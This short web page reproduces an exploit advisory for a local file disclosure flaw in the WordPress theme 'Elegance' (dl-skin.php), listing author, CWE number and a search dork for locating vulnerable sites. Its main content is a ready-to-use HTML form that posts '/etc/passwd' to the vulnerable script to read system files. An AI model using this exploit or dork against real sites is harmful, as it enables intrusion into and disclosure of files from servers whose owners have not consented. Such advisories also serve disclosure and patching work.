Bài liên quan
[+] Post Local File Disclosure in wordpress theme Elegance [+] Date: 07/06/2014[+] CWE Number: CWE-98[+] Author: Felipe Andrian Peixoto[+] Dork:inurl:"/wp-content/themes/elegance/"[+] Vendor Homepage: http://www.elegantthemes.com/[+] Contact: felipe_andrian@hotmail.com[+] Tested on: Windows 7 and Linux[+] Vulnerable File: dl-skin.php[+] Exploit : <html><body><form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br><input type="submit"></form></body></html>eof
Post a Comment